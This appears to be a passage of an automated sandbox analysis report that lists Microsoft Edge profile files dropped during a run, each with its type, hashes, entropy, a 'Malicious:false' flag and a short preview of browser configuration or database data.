                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b2f0cb3f-d134-449e-9789-66ec45ff9961.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39660
                                                                                                                                                                  Entropy (8bit):5.5627741378414255
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBJP7pLGLhbZWPOkfXl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVCfZCVw3rwyT+DD:fgkBJJchbZWPOkfXlu1jaLfZEwkyTc6y
                                                                                                                                                                  MD5:0A4DE3D0FF0D5DE33A82C897F7617675
                                                                                                                                                                  SHA1:487598B72E0C2D9D0C8D465783B1443E73DAC523
                                                                                                                                                                  SHA-256:36F8A2B5C41B6EBF21B0628F8567BD7E22EDDF06F4A4D0C3E5CC906316A0CF60
                                                                                                                                                                  SHA-512:0D6E4D499114A3DBECB7C3A70E9218E41E9FA83789AF59AD5BA16151CA6AFFCBA7B85C772EAB8509ECC2A8B99B8E52B722898717CEE2B358EDC464046EF67238
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e6bec100-3d1d-4459-b9b3-5357d4a65093.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e6f758d6-3b54-4d40-b19d-2235dcf67aaf.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18342), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18343
                                                                                                                                                                  Entropy (8bit):5.4574557371487415
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6rDyLiY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVv7P:sVsLAJu4YJVel3DJTtA6pUqQwl7P
                                                                                                                                                                  MD5:2987237ED0A04F22410948E892ADD6C4
                                                                                                                                                                  SHA1:6030DB8F081BEAA990D089DC64C3D1F675ACC61C
                                                                                                                                                                  SHA-256:2745A5CE121390FED23F1A279A022742391C83215E553EDF8B4AE0BA8CF9725D
                                                                                                                                                                  SHA-512:219EC12D3FCD859D2791C2FD4C77F6CB41CEAD87A65C77FDCE75D90501B7E5FDA4E4F1895617080579DE9A78C2FA60AC9325459E2B7C9401792B930B50FCC302
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fd03280a-5cf5-443f-8649-023b35e082ed.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18232), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18233
                                                                                                                                                                  Entropy (8bit):5.459564083168723
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6rDyLiY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVZ2P:sVsLAJu4YJVel3DJTtA6pUqQwb2P
                                                                                                                                                                  MD5:8DF69F7899B12D4942D6E3B2AC1317CD
                                                                                                                                                                  SHA1:0F837AB3A4AC4B57D1302492DD4273B2BF03EB1E
                                                                                                                                                                  SHA-256:B7E3142424698FE81390DBE8A7B4212F1DA4249BA8F69ABAB584EE7C08DCD0B0
                                                                                                                                                                  SHA-512:0D294B0476018A1595F6B3020102DA14664F07392D3F1632B3F71D8E10A246DF0404C6FCB9926094569CF394A2854A280771A17539C08430412ED4915F0134C2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.35226517389931394
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                  MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                  SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                  SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                  SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.08707491431787262
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:GEl/rCkyoel/rCkqtz9XHl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/UnnoiWrL:btWk5etWkGFnnnnnnnnnnnpwE
                                                                                                                                                                  MD5:4B0AD90E25D31647C02E495B95D1E828
                                                                                                                                                                  SHA1:57B52DC8E102CB41DB50CD8F31F758D3C04115B2
                                                                                                                                                                  SHA-256:DEDCD815B1763BD2E0A3CCEEEF3F427959FAA5B509CFAA25D45D4073663491C7
                                                                                                                                                                  SHA-512:70A43927743B0EBD9A6B7A88998FD96D09F45ECAD30A8E52B5A8D3CBA47224B55414D4133F312D2F02555E2145DBEA8E5E79F52CA53A16FAE7F405FD3DAF3908
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-.............<...........Nj.P.wf}.....f|....-.............<...........Nj.P.wf}.....f|..........8...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):247232
                                                                                                                                                                  Entropy (8bit):0.8292815736463269
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:1rEXrzxDXzRKiO6aMOIaFOkWYOycDOnsK1nOsv8VxTKyTyDUyWyCjy0xytO:APJB
                                                                                                                                                                  MD5:62857CC113B9D116A392DCA6A234F991
                                                                                                                                                                  SHA1:062C57576DD72C927D7F0E8A615FD705EA0D7D2A
                                                                                                                                                                  SHA-256:5174090EA2766D6FCF2C15A6527782F8E8F127034ABB48E8741C8238F5F79A45
                                                                                                                                                                  SHA-512:0041CDD97CBF18DEC62969504D28895B0F8E910DB6775AB4F07043C879F216776E6B69A9DDA774BC7EB3637AACD269E2C89A3AF3DF80EC2972FCF1EC085CAF27
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:7....-...........P.wf}..L.S..............P.wf}..... E.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):155
                                                                                                                                                                  Entropy (8bit):4.217326649266659
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:VVXntjQPEnjQvxljl03PFl3seGKT9rcQ6xwUn:/XntM+4ljlOPFl3sedhOh
                                                                                                                                                                  MD5:E2A5018C48A13FC609B876E30C1B9656
                                                                                                                                                                  SHA1:B63E2892DBE1D564444648928B7A0A5E0BAFEAE5
                                                                                                                                                                  SHA-256:CCB1C64DC802D5F25D38B6E2FB5B3599A5EA831BDC803C78DE1D1612BFBAF6AF
                                                                                                                                                                  SHA-512:B63A8324B6AD729566C0C10A7B1169965E690553344A949834C5B747C124467F80D9FC6BC7651123F501169EE006A0ACBEB6475C7EEFE8CF4686862C1FD82E43
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f.................&f...................0................39_config..........6.....n ...1

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                  Entropy (8bit):5.231571636654386
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/04M1wkn23oH+Tcwtfrl2KLl9MX/jIq2Pwkn23oH+TcwtfrK+IFUv:7/04rfYeb1LzMkvYfYeb23FUv
                                                                                                                                                                  MD5:C62A5039E96222FEDE288E90B5D6138C
                                                                                                                                                                  SHA1:E4269A849B96C7D67E897D77D6E6C7FD1EC68956
                                                                                                                                                                  SHA-256:804AF5BBB3D56D51C73165DEC0668F971D24BA08780E37477ACD255F4E8D8D35
                                                                                                                                                                  SHA-512:0BE978604135AF0A4C5E4B067A6E73E4E4BDF8AB749B932F3691B4327A1160BEB62B245097F16F133A7C9CF578AD9EBCDF2806DECB9201A85E1CC95C6CA9BCA9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.993 1ed4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/06-17:17:55.004 1ed4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):617
                                                                                                                                                                  Entropy (8bit):3.908330774290457
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:G0nYUteza//z3p/F+iPAz7QRjvRtin01zv0:G0nYUtezaD3RYiPp1L0
                                                                                                                                                                  MD5:3E0912AC7F87B099AAF69D3A8CA8913A
                                                                                                                                                                  SHA1:9A0AA7B5358A96404F404C388994C956C0F23295
                                                                                                                                                                  SHA-256:C2D81B2E57CCF2048836B95BB42BA9991A2C04A4C868ED432A2E4387D6D1129F
                                                                                                                                                                  SHA-512:1F01280A002C380BCFAF9DF00B6651B73766640BF514F72125FAC0B348EBA7308AE65009A065709888B34B05628D623D2A5E0B7753B3FBED71483A07056E712B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_......Q...................20_.......w<.................20_.......ln.................19_.....G....................37_.....[Q.|.................38_.......K..................39_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                  Entropy (8bit):5.202506600080695
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/+VFZn34M1wkn23oH+Tcwtfrzs52KLl9+TFZnFIq2Pwkn23oH+TcwtfrzAdIF2:7/+VFZn34rfYebs9Lz+CvYfYeb9FUv
                                                                                                                                                                  MD5:5629C70D84321BFD551E15C13B83BA95
                                                                                                                                                                  SHA1:32A48B98A5CD0B1B35418DA9ADDF58CBB31DDDBB
                                                                                                                                                                  SHA-256:E7F2762C855F99752C70865641DECD877E3C1E13CB35E74124FBEAF12A86921E
                                                                                                                                                                  SHA-512:24ABF78AC061A0E99B7B52E022814A3F9F0AB3EDBEDCE7F66FF283A513750079C8E75E82769A7E743DB587BB3B2166E95577CB62F1682415A8DCEC8E782AFA73
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.980 1ed4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/06-17:17:54.986 1ed4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

